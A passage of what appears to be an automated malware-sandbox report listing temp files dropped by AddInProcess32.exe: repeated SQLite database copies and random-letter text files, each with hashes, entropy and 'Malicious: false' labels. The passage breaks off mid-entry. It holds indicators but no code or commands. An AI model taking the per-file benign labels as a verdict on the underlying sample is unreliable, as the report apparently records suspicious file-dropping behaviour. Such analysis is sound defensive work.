File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3D04.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3D44.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7220.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7221.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7222.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7252.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp777.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp778.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6C1.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6C2.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6C3.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6C4.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6F3.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA6F4.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDB54.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDB55.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpED9.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\Temp\tmpEDA.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\Temp\tmpEDB.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695900624002646
Encrypted:	false
SSDEEP:	12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
MD5:	BC4419B8B9970FEDCD704610C64179B0
SHA1:	71BD107584E1CFC5E5E75F765C064FC13228BC96
SHA-256:	A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
SHA-512:	454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
Malicious:	false
Preview:	PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

C:\Users\user\AppData\Local\Temp\tmpEEC.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695566741548326
Encrypted:	false
SSDEEP:	24:61iSJC9lUfmxZoTgwj7WkGrivJpQ4t468phJvvHIm:6M/lU+x27HleIQ4t4bHIm
MD5:	CA699715DA51DFD5AB81CDA02AFD2CD7
SHA1:	72D44C17A04FAB316BEA20F61A80D7AC787879D4
SHA-256:	BA61F500E1845F2FC03C990DA95B7DD92ED8B7583744C941D37BDD90DA666D21
SHA-512:	497F9D6B6EE52454F4B740A6B765F46EBC10575E9A20B62D76594E1CC4E37868182D18315E05E62A78D5131A5569C95C8989F248E3A8C72BD95A99883DF196D2
Malicious:	false
Preview:	IZMFBFKMEBTITTFFYOGRJOKLUYKYEMJURKRTIEUFEDJKBQPELZNUOXWVNDZJRAOONFPZIJHBCSQXWTLQPDNPIJFFQZDETQFKNDQYRTMSHJIWQXJBNOXAVBJCARKFOKHIBUFVCEOHZTISPCFZSEFFASUHHMDHUBAMSDTGESWVKGUMZNYRLTUEBNLLDQOMZLGIFYUADUMCNGQHUWJKQAWHNDDSWUDEYOPPNFAUERMDDQUABWZCHPIWYDNDHUXDNYSLQSQXHUJRCQMGRZMRHEOVRBHVMIEIIBHEADKNABKWVMULXGOWXFOLUTZDUOKAMBBJKEPASVGVTDOUQMBCJGMPZZSAVFTSOBTVJPGYYQSJQWHRBFXNUHYKYXWZSTJELLKRMBHUVLFEPITLTURHTDAKMVDVNYWADPMNSQACTPRPTZDAYSYQHCRSDUXMKTYASRROVGGBBIXHTORYFNKLOIBCKWHWPTJGKEQOSVXTUUTFZVORIRTKYSUWDEDDGTJHWLZYRYCPYUENHHDNRWCVEAZUDOXSWLHJDIGSALQSCJKGZEXAIJUDAQHXCOAVPDFCQIEHQEFVSBLKSKPDHYCYSPHGVTEDVHAWYWOOWFAJSTOXLDYSHUWZIJQGRICKYUZPXLOZURIDFCEWXUMATNYLUVJTEOTDEYCCRPCVBPHMOLWESOWCICFDWLNMYIPCOLYFBDDSRCSOZZCSIWGDPTAXMSUSNBSGLDTYGEEBZGXKIVMAHAMBSJEUPRTVXERTMYQWIYUTCCWNXDLXQQSMSGHDXMIYKWUXJBHOCOBAEVHTWJOZVUWZIGVYBPSQGRQDABKLPWJJRURTHDJAMMOZSJFGCHHDVYXDYYIUIOZDZJWQLIKTEKOTISNTJFMZOMVLIYUHJEAMEKRMBWXHAYWZVDUJKHILQWXCRKUPFLJKIKWARBWYUOFDHFXEHJWSBCSSQMNJANADKJFCPMBCMQGQXNUCZETZWJFUFSMVAZQXHOGKPFDO

C:\Users\user\AppData\Local\Temp\tmpEED.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
